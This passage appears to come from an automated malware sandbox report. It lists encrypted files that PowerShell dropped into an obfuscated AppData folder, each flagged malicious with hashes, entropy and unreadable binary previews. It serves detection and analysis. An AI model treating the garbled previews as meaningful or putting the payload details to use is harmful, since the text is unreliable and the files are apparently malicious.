                                                                                            Preview: .....\......D.R..L.*...-.y..zf&..,TYTO>:v.F.......c.....B.M..!.8.6.&A...n.X...jH..)...3.%n.....T'......B.....EEe..{..5.._..mt..F.....u.t;.I66(....-]....J....,\....Y.f...".w.(..V...._..USs..a.)..9uw...'Ln.."."8..v....1.S^...N.u.5$....Z..:.1.......|.d...M..O..D.........G...$.i......[..(.D...Y.....W.`.....(.....N3...pth3\.[\@_ro.rF.Y....9._7.u.e......,R.H.....)U.F.d.#u6...$..Q.}iy.`c.,-.g...E....|....Q.X..bY.K..(.e.7+...w ..@9.O.^.......4.....F..D.E.0....(.JW.<qS..8BW..B./..q.~`.T7...@.@4....A.......<1m...6B...X....Q.K..%.<.L..m..r....&.&..!...P#..1...I}...a.6....%{..|.R.u../.(5)).<.H....Y.Y}......a.h.-...|+...h.U.l..*...f .V:`.h].......@.q..r.3....[.<W#..LB....Y$...W&D.B...L.r[.Z.LK..W......c......q4mo.0....Y<..V~.g...ce..S...g.d]."&n.6.Fr."L....[.~.D......%.......0..0Er3oBR.E...Z>P...V..u.;.[?W.I".K.M....z.{.o0>.....o..7........`I.GJw.%,.~.e...;.e..2...1...!......"~`E.I..7k7.fG.\....^i...?..ya..(.> ..../..#8.$..K.T..GV..G.M..|...l...}.].n|
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\EiRchpfIFtKU.chewIUsPOzbuYQNk
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186427
                                                                                            Entropy (8bit):7.99890013736535
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:eNkyDw8Il/5zcQwupIHcL8MifmQGFfvrMaDu/yfGje4CwmkT1YWCCNtpwpQ:yDw8Ilxzc2bLrhQGxDDu6fGj1CwJT6W1
                                                                                            MD5:39BE2C7E50C0604F84E7BF19A7ED0071
                                                                                            SHA1:EF4E60C4BE2DF1BE95AA2182FB4ADCDF29038092
                                                                                            SHA-256:0B3F846212FA2F219FCC8CE12A91963A0C7EDAF27B74D046CDE7D9474F3B213E
                                                                                            SHA-512:021D356DCACD38AA78FD62100417479EF316A1BE53D770E4B9B16065501E39FB1C9ECEA8F9C87225485134C291686ED3B23E81F9443DE154AEBE3A8E368CBF28
                                                                                            Malicious:true
                                                                                            Preview: ..}1o.2.>!5^\.V.......76,N.J..w.0..Ya...$..Vc...N..a...E.C.b.;v.m,..@J.".n.Ob..b.a..|.pE..e..pu.0..7.#....IQ....zbrL..B..0-.?h..u.K..x...E...0I.W.(....{-.{..p.X-..%.......d..0...V.w..K.=..3..u+.$&mV.J.5q...~.._.... 8..U@.k..9dw..S:..Bz67J..^.?..x.S.?...}.oT.....M.<..g../~.E..!......x.+..........,.f...Z38ui3.....Q.?f.o...+.}:.2DQ^.o.R'.D.^.v..43...4kH.x......6..!.u....!..A.{..I..(...N.x....'.b..#.i..n...;..m...F..%..c)..5....E...b....'$.`p.!.....3..`=?Z.8.j.X.?..mN....."...qe..f.....$.N.Ko.....?....$..J=9.....iRN..I.H.N)]..;...2..4t..NE...|xyP...I.-]...,c\.>}..+.4.j(..J]......A.{<z.8..[b.C.z..L...N....%.NFN.Z.r........^...\;..s...5.B......1..........+..M.A..@h.<.].W...I...T7...aH%..Q.rHPYg9..p..14..N...Ktk4... ....^..Q..]..h..,.?..7.'..%.J.`.... L..Y..2.....5.h....`...g...>..#.^m.......:.AX.._..........e.].O......x.K........tF.=e......}......].LF.]B..A..D.XZ.....2.Fm...(....Rd-.$.{.\....%..e..o.c...t...p.c1........T....j.~2:B..-...[M.d+b.....q....P
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\FXsftcBnRmArDTNopIG.nBRdLfvJAjwxHi
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):59109
                                                                                            Entropy (8bit):7.997126391275654
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:EvIORvRRlezezm+CiHe4B1cEM3ePgPZ+J0:Ev9lq8mF4B1cE4ePji
                                                                                            MD5:DB39907FCA2D86160E94F756C7D89852
                                                                                            SHA1:8B8BC67DBDA24F0E2782B036A05ACCEB737F3BBF
                                                                                            SHA-256:88C1864DB942F59FF0A5FB9407FC27EAA42C8564DF1FB5FCF529EFCAABBBC824
                                                                                            SHA-512:C4C21CCEB80EF02BED61E833905DBAA50BD51394B2438D2B780D84AD54E9C9A7E0142C32F96C8C5AB7BC5C459342FD1A83641DDDC1786FDBB2656C59D9605FAD
                                                                                            Malicious:true
                                                                                            Preview: 9..}...K...R+}cV...jw....+`.e.l.J.lcF.Q.0..Ne..".47ASb.....X.=b.2..,..m...B.r..!1h*L.dv9...5..i..7oq.)....cx......?J...i.q|x.......f,.`..|.)[w...;3.....(J....h.&L"...S%.5.....*4.Z....A=....A.O:4+m.....5...5..._...-t*w.<\Q.rEaX..z5s.{Y(.N2..^0U..B2..C}&..;..d.<T.)q.G.....E.. ..1.&.!7.M...E..lX........g83P..J23..z..........7_...do..=...cq.....V...)U8..C.vv..&.....s.a":.0)..G:.0Y^..E,Z..KY.mJJ.d....9......c..;.|....R......2..._3Q.M....t$oK..._....X.G..*.)..!...v.....o.}Ux.r..'Z[..q../.6...cy.+2...z.......}..=.........!z...Gz#dn...?-...g.*<.<.&Q..B..Z.O.'...,W..v..u...>>., (>.+8....c.Od/.....IM`.U.........+.!:..8.AcBi.YZ8Mpy.T.B;.........s.Mi........W.0..>a.6`T.9.._........jz..'.0&.U.a(.=W..j^+.'..Z.M.#........w..=.a..GJ.L>.O2s'......z.Af..T...~...o........{(...}..3..OF....e%.9.Gp.).Dt....y...[Q..%0.{.a#Q._..B.ET.T.W....[,......rc...{ "..!...;.....M...G5."TU...;-~f.=6.....Q....<ck.hK.>E...yS....~9ZTkW....../.S.ud$.2.....f8...#6O.....j...b
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\FsWrRkPyOwJoMfluUn.JYVOCsvNtXxpBEU
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):141405
                                                                                            Entropy (8bit):7.998828265086002
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:RoD21eNb6pYS3/FRe5DaqcX7CMojPv2qgy8E9PXC8S:RGXe3Nw5Dajlojn2qgy8OPXC8S
                                                                                            MD5:68693D7486523300F07DE2A07744C9CA
                                                                                            SHA1:016BC50DC61D5E6C40EC53200EA2921EB22A8091
                                                                                            SHA-256:731A31E1005266E004CD4F26E6EED6AC5C1C54DBC9AB37027B449766DB8F1409
                                                                                            SHA-512:CE66D8C324BFCDDE5126787D2F1B42179BCF1CEE8D9E878A86D258B90934707B7F0E00B91BBF82B58293FD753BF348EB696F56C1AC9871997A93F53AC65427B7
                                                                                            Malicious:true
                                                                                            Preview: ...0..A...fb@...>..l.vu.........2..t.jO.t;........(@.o...x57.oF...@.`X.N.:.....n...H.Smq....a.q....,CpZ..4.>..G.B.g..^.U5.f.hAm.S..9...o>V..d2;....:?f7.........'..@.3....9....YU.J#2...r...f..4W<Gb....BG......U..?y...W9. ...4lXw....._..[Q..{.......H..'.4.f....8^-...)..= .8x.b...r.........H...6.+.. ..7Y.*U........s?.I.....%..BZ61..m...k....?2/..Eyd$8..Uc...y|.[8r........7.....[b.^1.= .S....R.....$PX.......h......ax...``.....-}x.Fo.....!F{......B.#..E..?...w{..mW.....Yc.u....S.T._*.....55......G<..=p........n$....-..>..]#`.z.;$.fr....H..2.....q`..I..3.j.]...j....x<.b.../\.N........~g..d/Q.-..{T...%/........]..........k.S.=JV.747...Y..] 6f.J.<......e|wq.....(%..!.]{W.=I.|.......j.%FO7#....i.@...P$.0,...r......d.:.>|R.5o.i...9ST..8.@t4;..O..:...q.}.....;..P..R;.J{.R.H....).....aG.....B86=\{.GPu. a.'gf..p.....>.d%S.....1U..=.XC.;p..7.d, T....PWL...U.c....S..>h.t.@...e..`.J.h.|4...8_..T.H^.gm$.....c/d..RQW-..N.4...P.&V..&S.\%.....[....
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\FvCmpXgloUHxqLBz.jQcUyPWvmAh
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):56004
                                                                                            Entropy (8bit):7.997028439153857
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:19+kcgJqc/dVBQRtiO9fbVrdZkRmrt3sdE/:xnVGLiO9fbVo2tOA
                                                                                            MD5:342708A3D7E5E480B124DBD2EF99CCC2
                                                                                            SHA1:345D9F9D74E7704AAD9A90F10522F7E08D8E87A8
                                                                                            SHA-256:4BB3E2870EF98C0BA124275655A338600D34E95CFB186B1A4D893795D153A88C
                                                                                            SHA-512:298375E8887333FAEA7F671F11A9FC800BEA2F7DB80B62DF37583409686C9E0AD6436E559611C75131CA37A8947EC491E48C547310AB8F16AAF0714A1D97A4C7
                                                                                            Malicious:true
                                                                                            Preview: ..s.....,.+I...E.".....y...g*R F.$.m.s...._......}.1...?N_mr..w..0@x.5Z,y....._..(..FJ..%.P...a.)...R...[.C.m|Nn.k.O.A.r|RR.Di.....l.C.;.....V.i..V5...f....G.;\.9..(.....x%...@.dw..Z}!m....L\.../.w.Z.<..P.....4F.?..j..t.?_A.+.!...y.+L-4.........P[.s......2.1...O<I^..W6....F+.p.g.qm.Y....6......\S...t....g.r.X.-R..Y...94....~R.......z.6;.!._.]..WX?...-l.A.b...kl.Tih.....;5.t.G..F..CPM..BL.- .v^..........6..UH.D..s)...MrRx..........*FK[K.u.b..+n..w..8a.{..nw8I..y.2I.E....z...XP.....6=.....+-..b6<..2.kO......'x.......!x..T.MCRG!.....XD. #2....v.|wH..D....G=...Y......v...8..m.....&..I.O..j......et..9\.....r.JFA..Z.XB......u)5...DW.>.?*..U....R.@.."...#W.L..Mj...f....B..wmk-..C.Sn!g.c..!:Z....c../k...^c...X..G.c.+..3..._.........@.1...E..l.s...77...%y....*.m........6}.J.y^#*.6.cy.H.....4..o.....T..b......".y.H..[dA..KI.]..V ..b.a.A..W....t.vW..`.f.CcP.F...,....,..|...H8...B..qc.."...K=r.U<.z]..*.....rl..g....U....:..t>....Rd..l..L.w.?.Y
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GFNDrRJQMepgqul.keibGwgVIQvusja
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):190873
                                                                                            Entropy (8bit):7.9990202472093275
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:O+9k1tbxVeSmV1Tdq4XPkYsV9loK7X3ngKHvqKHBhAP0k4FFkqH61wrz1:Tk1dIVlRMYsqK7nhHvrAP0k4FH6gR
                                                                                            MD5:C57E3EC1F980E86205F28BDEFAEF3919
                                                                                            SHA1:96A41697F2972D15D48D4F2CF985B1596CED9A83
                                                                                            SHA-256:534AA02A6EC64CA3E05EFD95914C60926A437968036E4868B37C5A795A0D5D43
                                                                                            SHA-512:1200F486AB5DC46E24F520C8A73DA0C41F5C1C30C11E9DF65248C1B2BC855A7C45E6F69B111C17F21DB8BEE2801833E2C37ABD9744E02CA4E5D048D0B21BE5D8
                                                                                            Malicious:true
                                                                                            Preview: ...f.L...c#....$........dT(..I..D..1ZJ.M3..VR..x3p..?....4u_.X.&..0......0..C....1..9M..W.X./..\...B..*E.......;..c.o.......o..k{.1...`....j......<..J.R3..m...)A.CO...k..f....l.k{qCr.....X.al3.Ah0L....d..9T.<.7Z......O.9.2i3..v../N..r....v..|.4.X[.(....T.1...a......s.}&..l.6.4Z.}...n...S...O.._'K....c..i..oV......f.! .9....^.G....2..T.k2u.{0..........)?...L...N..S..F..!......M.>.....W`.AZ....)...T>.B.!..k....,~..J(w%.Z.2.`...v...S...6..F.l..c.(<h..9.v.k...f.A.....2..|....b.M1.9T`...W..u..o.......tw........d.*)... .|..l?...j...{..c....?3.C...........K6R.y..8......W.....s.).....f...k..-r...M.C....J... .{.r......-C .*...TFx...'[.3`D...gQ .....(..y.i_dz...4...8..qL.KS......m'P..fd.s..|.6.Is..b..$.dJ-o..Z...>.....XEz,.....p&q).Du..~48.B.tO....zy.5..~.*.^..?..lb...5{.Mb..<9"......x...n.. .....4...E.....@.Z;..J..y......-D..-Z...D..%..BC...%0...iJ.\.~l..b~...V"...@.m...4G.b..I......1CgPo.M..9x.....1M.q6k[.M5Zh...z.h.z...A}Z...+......,....!..NK.d.z.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GcDdpgBqmPQ.muUMBsQZhlLo
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):118387
                                                                                            Entropy (8bit):7.998401157833594
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:sap5Yzf11+0FwJl6xA4jaUYcaJFg2vTtO1Rb9+BDCs:sIE1HC0a7caJ68O119+hb
                                                                                            MD5:5454DF78EC40A7014ACC1A83AD301154
                                                                                            SHA1:573AD30A10F865A735366DF1FC2BFA44862CF2FF
                                                                                            SHA-256:A1BD48DD5D6D0A503316AFB08B79A8C62A99044021ED33E9974A79C0E3431ADF
                                                                                            SHA-512:E7D907D25B0D03C9481785D77D6F42A09DD8DED1D98C0B5B8ED796553DE9880CC8992E16EFB3FAFD223E15495DE7F4C2CE5231FBE7B3DBE3F58B0B2423C53D11
                                                                                            Malicious:true
                                                                                            Preview: ...s...".....,.....Z.............b.........8........./..h....l.....EV..Lu...G.......D.2..4...{.^..J;W..7Xj$W.!."...m.o.3!..[...%.Ay.....~.e..%........&$..t...;Y_..N>.....a...j.]...u...~./cI..z)8.t9..ye..4yx......*.-...B....hZ...O....N$...L.N...U.F/.."..x...2!..~.......H..D....].w.q.....q+.[...&XgI.*E-(...m..rt%.#....S....'.=<...G..F.[rL....T5s....^.^anc..}Oh..*Fn.t. K.L..:...|ZD.8Y.@.qt..;....0.rtq.J|3R.$...A...4...N...n....f...x..h..CO..O.AN....K.".sa..h8.Q^....y&.k.b...,3.;RjA$2U{..H...T..4....P.NW..{.R....D....s.ks.).n....D...........56......}>..%...Tx..^kBR*.m......ZS.%.X...S#...s.o[;.D..r...4y...1kT.k. JU....\....`.p........fM...../...s.@...M..;.".X...yc4.JG...D...i..B.....~+g.k|..m.KO.>..P..w.qU.0[......a...c..n.DG...L...?...#: Y....V.=...y..MQ.C...Y...n....urBM..{..[6.8...Y.vh...W...3..4B@v6._..V.$g. . ..1|.........q.M..h.E..@....e..M..r..w....|,H.2* ..S..%U ..@..S............NU.g..6.aj.LU..L.Ny.?x...43.\.A.Mx....-.57
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GdqiwFBQpsDrbZKN.CSNGEXIeZWT
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:SysEx File -
                                                                                            Category:dropped
                                                                                            Size (bytes):70016
                                                                                            Entropy (8bit):7.99776210793591
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:l75abUuGLENsutG1pi/AnkEIwNcW3DEgXENxkNZ7+HgHTE:l7KUyOA4nkEpDTPXENxkaHgzE
                                                                                            MD5:CC72B292E5A0F6C4B12D5437649BB27A
                                                                                            SHA1:DE4A72540840BF8F92C51E08F129B0DC36C20AC8
                                                                                            SHA-256:C75AD5C9C6DEEC85C459EDD4B4E6FCE5996C97F1C73C6B8E32641347FE4451F9
                                                                                            SHA-512:8A61F2F542E02BECD56B651C4935CA77F8548498FEE5A49B1D9352C6CE07A5A6B2B6288790C42B7A7C39AECC090836081225BF745FA75860A1E592D4C75899F4
                                                                                            Malicious:true
                                                                                            Preview: ...S...!F....p...J..A...`'....l....f.p?!.t..`$z...:qSF..*..... 4..D...tv...3........2s.|iZ.w."..y_..6>..g....*...D.`..f.w.>..]....*...xXn........A..]..n._j....m...q}d...e....|.S.q..nOt.C...o6.`..?..@..%At(...?.%7...A.:K.....Z(....1..I...{l..............~K..m..4...H.B...W.<.......<./..M,...u*.. ..+.....p.....U.......}........ ...|....&..C.LuE.N.V.g.~4L.. ...m.$..OI.a.9*.8lb..v.,.%H.4....0...q ..q.....".G..".C.A[...PL.....c..K.){nOU.kM....H..G.. *. .&M $L.Q.`..'..^.Cv8..@..gw-.+|.Z.)..G...:.2.fsa......+..L..F$.5.U. a.LB.rV......|....q....*...ij.f.R..6?.nv..3|.0....[...."&...v......^.&....].+^....>.?.E.}[.....vO...7..`..t...Z.......}Ar.T..r.7.D.}...........;.v.gB(.......{.=.o.. b...D...".<..e.t....=..x.kb9...Cv.S.N.].....S..m..y...ZBa.-..... ...I..I.P..............0"..T.%d.jl./T1.~./u....%.:.'F.&...I.d.@.,`..pj..z.U.J.}..[).c#..Hd........^.G.}I`_.(...I...<.0Z".Q.;c......q....R..<........Z<..*A.N!@7d.L.|..G...L..g.gu....d..he...b\4
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GhBlUWJfmbEFNSgOeti.dsHkrSPjKTDoWibhB
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):109771
                                                                                            Entropy (8bit):7.998432692623651
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:jRdd+7bRcP67v+SmZLe0Yll5jnV5gM7o6sxyUPYp:tn+7bK/S8yX/V5RTsu
                                                                                            MD5:C99160FC282132887C4AA2D45CD866C5
                                                                                            SHA1:4429596001FBEB6DE427EB382BE4617641E971B8
                                                                                            SHA-256:BD7CED80B685391B37769DC75060C4FF01595F032E079021C2B0D8B407BF07FA
                                                                                            SHA-512:38A1C47EEEFAC5945931050BAA518EBF4C5F0E2B16D77D7FFED694BC1844902BD9A0A3EB3AD30686686CBB4EC8B1B51F177DB9219D9AEC6458792F194DC663B6
                                                                                            Malicious:true
                                                                                            Preview: j1=.iZ&...\...|.}..B).j..j5.>.dY.....3..:....m..2.%..\....%.Y....G...I...\......u..>P4./(|...Brq..V..,.........c..M.s...c.4.T..6.....I`..I.......'.%...t.........X.CO{9..h93.J_#.-..).MIC......tc.....8...;.#}Ck...P8/...7.//..W.>..V.....h2....z.{."#*....s.............@...T....5.4....~S....XR..:......^..-.t[.R....:..../.@.nh.x...<.R>~.r...1;~5..j..o..R..[.@.}s\..g\.Q..P@..r.35.r.P.s.....H.5$..."..D.bx.[.tk..$....).\....m..:..e.2YPT:...!g.=.*E.....^H.....\,............q<WbLi..S....<...E.y.......!.[..ba.....d*>......A.f.`j.e?k4Q1.....".$.C./..J.oo.-0.y.&..5el..52............v...$......*.,&A.{.....d,..O4.. ..1.....{xa.7...A.x..A.w..!..C.I..fi...X.b...u.`..9..oM..R.;.q....'ub.|C....r.Vp.(.Q...X.#n...e.(..9J{j.Q.n.m.R7..I.q:......'..I.]6...5b.U...6P..R...-...*........s;....0)...hGb.[.s.W..)7w...;\....d..2..|.4T#8..;.g.@......J!..{.Z<..E`@.Z....S..$....tLQu.O].hE.9../].-&......AE[.9.R..7;.N.~!.:.........g.2...../T2.;3.!&.5\g.......5Vq...`
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\HgscSMKine.GdwrFeoEtaxORb
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):112207
                                                                                            Entropy (8bit):7.9985594438719785
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:bHoOa9/TbOPqJUXJhHjQnnqOF6SbGPB3q/dpMnbnVpSE+YXJYaLmxH9REiICrQ4o:M5RHUXPZOOBs3MnrVph+YXuaqF9P78R
                                                                                            MD5:47C5880EFC7DAC03EE6F5F92BEE7A293
                                                                                            SHA1:D09812366008F84B7D41876CE380CC1425090F06
                                                                                            SHA-256:3A8F5D186DBA82EBA9BD77A9C248B2A07DB5674767C5FBD3CCC271DEE529B4B2
                                                                                            SHA-512:6D2A0C3D35D2C3737DEC6FD97C78F3B086747C2B1DB46A522EC17A74477452ABFB32E17124DC6C9F9727B16E503060F5DE5E227E477A89489DBF22E1CF8378F8
                                                                                            Malicious:true
                                                                                            Preview: ..4....!?..G...@-..!...'.].m.295ea...E:.K.....*.o........'.y...pv.[........3)..l0.K{;^cQ....X..m...i.rvC...v@S..xN.e%..(...2>....E.q....6..y..._...E.H...qF.D....v........I"....P^^..[..UW%G-...Y.u..T>.Hjv*n..d...i.....7J.y.;._..p....PS..Y\(....[...Z......;..0u.O....6.6*..!..<....<Xu.+.....I,..8....##..@...-.P19.....[3...gi.m...4.)Y..j..W..h.r..$aAa.y.....c.e.$..f...y..y......P.I.x*Dp.q...D........X.fvu..Y.....[.x.._o....k......@......._.Q18./.N[...E....d.Do...)+.....*W.3;.........V...^........+.(....C...0..c.}...%#.W....q;.....m2......*.....O........."..g.+...U.....3f...P...IR..7..J..H....A..>.*."..1..%...t*.. ..[.4.(....:.I.....~H.S...el.....8W.T....W...K..|....o...#X..6P.._.tpx5..c...~.%....@.B.F.DQTx..Z>.ef.c..s.X[...r@/]....-...J.....?..[k...T.6...5..HP..X..8......_.K......a...QC...l......i."Q..h...N.7,,....'....|..Y:#..6....s.o...y....?d.'..!XV,.U..M.!bc..]k..>..Q..x.D.....G.Fx...P...W..>....}..e.C,\u..w..z..F..s&...8.n.A7...$g-?5iA.v.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\HsbVFMRyapmDkzTXI.vsrDUdewyaFKxGj
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):54850
                                                                                            Entropy (8bit):7.996853138512541
                                                                                            Encrypted:true
                                                                                            SSDEEP:768:EhfOCGGEt9c3yzLBHOgIIuBgZ0A1bDXxC/3HbB3/KU+JCu77gSmF4LyplQREBLSY:AJgc3COgmBgG+8bJ0CuvgBOWJSHvL5hQ
                                                                                            MD5:9813CA775C92C7431181CDB278F82123
                                                                                            SHA1:044E4D18E2C6ADC360421677FD0807D81A0B89C7
                                                                                            SHA-256:580EC8265EF0AE26D9E27C3CBCAFEE991027D6470B04BBBA92F060E96AC7DD91
                                                                                            SHA-512:C7D7CBCB047154820BE565366FBD8E812FA94D9317994BCBA3AD105679C059EFA2C78310EEC0123F8CC5B23BE5FCED2C607D5E2170416DF19E9F5F3357220576
                                                                                            Malicious:true
                                                                                            Preview: .......u...{R...O....^...6..}9#.....pB.."k...k..&<.~.+..Q...y.e..j5..kO......,:V.=.DOU..@~... ..k.../"BY..5...4.<.!.C..E.lX$.~^4.e......R.R.DBd0.Jt...Zc..5.`Bo'W...!.5..yNU)...r.....i>.....[...R.^.B>...a.Q.A.o.e....g..7c....~h.^.-0..u....;Ic..}K.k...R.hgx.T.....A...a...3(..A...3Rk..M..n.x.+..OfW@..v...*.O%\.;..Wl...>S}4..I....%4..........3..G...K+._`..P..].<...F....S...ka........"5=.N@..^.....~NB.....@....K.~.?.....5..:....X.P.....).He.;..k...m..Vv-.?.3.+..)..SW...s*k.E..U.D..!..uj..O....?....U]IQ....e...........^..Pz.g=...^...Y..6.`'...9h.y.....L$.+...&...H..eK.'..^)....YI..@l...5....9..gA7H8.u.1.{#l.M....z.....0O~..`$..p.....;..^.KC.>.0%.9.8.....O.V.r?........x@g.:..a.d.7.f......0.V..'.X.A.E..j..l.Fb5n..=(..C|..H{...r...")....h5.4@........]>.w.....=..E..i,5.`G..z.(..kM.$..[..Q.:..I|....Z.9..w...h.7rL..ya.. ]...=.0o........<1].o`..<...*..r:(...:]...yk:*.h.%`...".E....Zt0...x...v.r.\.jv%fi,.#:...9d1..xI.c.>..#. .a.....$.....bKd..o^..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\IwTztFHhQrdRxGpKcUW.tAKIPwaJkSqjgsHbDG
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PGP\011Secret Sub-key -
                                                                                            Category:dropped
                                                                                            Size (bytes):54852
                                                                                            Entropy (8bit):7.996783257988784
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:uJBpNxEBlryfO5SsuWgKMrZWoY4Jf8w0IpHM8ObfpbM9:uJlxEBlryf72gKkkoXJf8w00pObRA9
                                                                                            MD5:BD2EF7EA8962FBEF15B38069504E1151
                                                                                            SHA1:0C54ED2B1D016DA78A6D6EAEDE7F2008E6767CEE
                                                                                            SHA-256:802D5B982DB2AB640F860D741DA4512F237A63940956489A43221C83A54344D9
                                                                                            SHA-512:FEE2AD3999EAE47BB02864E74B4265E00D3F333BA1886EDBC5A8C2C9D0140246DB3A4C2DC3C6AC222EA9AA56F19AD1712916996E458C565A683A4DBEEB1EC90A
                                                                                            Malicious:true
                                                                                            Preview: .9>...\...........O_.~y.....;..n.i.[M.UN..V..~Dh...H.S..t.....i.<.L.4.....y#D.Y.)...D.w.AH..o=[u....|..M...b..L..r.w6......<.6.8....-..<.{Ve"W..y............,.I..M..D.....p..h|.m..'....p4..g.h..x...4.1".@.r.Yz2go."...!..*...y..r..(..._.oY.Y..CX.\.q`3&.6:...i.[...+y.M..z.....\A.%g'...$.u@qQ<q\q.&.....eud.xgj.'.5&..\..(?=9[_V f=.5C...@.Z3>.k..I^.K..bF/.^.......*....}.b...{.2...N..m...(&..D$..Ao.eqY...`..k.O.....Hl-...W..............Vu....0d.S.Ac...v0@.....:L.... A[..OQ.#...W..!.{^jE.'.Ib?..d..!"9.........=..5....m....D6...f.`5.f4..oUW.)f>....N..k&......4d.'...W1tz.._.....l...=...S...!......|..........g.~.p...]..m>....e.T..D*}........%..l.2...63.....a.}.:....:R(....Q...h.e...N..).../7=q]Xx..s2k.p{JENO5...,,..X.F1.{F..W.|I12._...t...Z%E0..V.b.9....,Z..[;....A...6.o.. ...G&..F...H...p.@4bO.n.,b.....X.1.4...I.......xvq..`vE............J......RFu..j.m..7..}.9.....5..1.-..?.F.AeZ-F.70..7..K....q.....k.<......I...t.p..Ot.W.`..Y...GG.....o
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\JpdPkirxXzA.dUxbTghEqwLZHrPSyOF
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):82623
                                                                                            Entropy (8bit):7.997586869059904
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:vhHyPqGV6v8ePUpSzI0peqz3IAA5qYf21kxp9e2HdHI0FxFBwSoG8cb77:vhHyeDzIgeRUYf21k1HdHJFTBfvbn
                                                                                            MD5:20B019304BCD993069DA1C00A5BC3D4E
                                                                                            SHA1:9971CB13A675C65392580379D4A5C53C22738FFB
                                                                                            SHA-256:CF6BAC50DE0B7BB72D73624F125CEA3C33B4FB3B912CF42B1FC53B46599EFA73
                                                                                            SHA-512:6EF6781DAC7510E5D73202EA3BB754B54595388E421A077EEFDDE0647E6387D68EE9DE88929B7F993F92D5CB6B474225F4977940FC2A15FC27BAC68888F19122
                                                                                            Malicious:true
                                                                                            Preview: 0n"^8.......M7kg.`.......I?..:..6L......Sgl......W.7Q.vNXi......(...a...D.6.f...6...EH...iI=]7[Y..-c.?&.1.ip..Xk....:...+.@j...7y .$^...VV.....9...JD.f.8.....n8..d..%...::0...vIj.!.L=.".gJ..C1.C.p....u.E.,....CKB....&....>.v..WHn..zJ:.....m..RY=.../.I./..7..#]bOUf..lkL..1...9.~...Y.K0lt.8...Y..l..U.......K:....H..z....T..3!q....`@6..M!.(....IP..y.A.^.j....]...D...V.8.M../.!..'.B.X..p...$.C..=......U..{.pq.*..j|... ..r._o...BQ9.rR..VCl..Z.... .o.(.{5..x.B.......P..SjZ...F....A)T.<.)[`.}q.+.S.......dJ..g....Y..R.S..K.h.4}+.J.$..j....b..q..^>..r.D.{.U...e..e...W..Z`./WC.[..>....r[...p.~.JJf.\...y.z.V#v^Q.?&..b..'}vj.)i....^.W{C./B.7c..l.X.\...@.i..,.t..~..E...3......}...9...E..4.9.. ..(.W.%....@.P.p...;eDA....u5....4.u..F..E.......++..~?W.t=...o.....}\.g.....A..N....2.w8......l......BS.!..h.p.f.....E...x..>...._!..../.`4M3..n..5.nh...(..T."...|.!....Ksb.rcK.p$.....H.|.+.....fw...\8..s... ,....0..h. .^.|.^.5.6X......y...P.y.Gb...<
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\KlwmIpaSTYyehqr.hPOZxTsGbfiX
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):129096
                                                                                            Entropy (8bit):7.998330756061086
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:frD3Fnlx0csLCMz/xsksRxHveO/0B2wfoy+CuTY1:frD3aLJmXveO/0MsNuw
                                                                                            MD5:BED83A40E23F5FE93DD8DA9E38070310
                                                                                            SHA1:C3F3A6E0DAB2E8D1E1309E8708B593647A2CCF9F
                                                                                            SHA-256:25AFE5BC9BEA9C2DBA1910745AFF1D811B30A9513B0DBAAB02D98A72ABEB4198
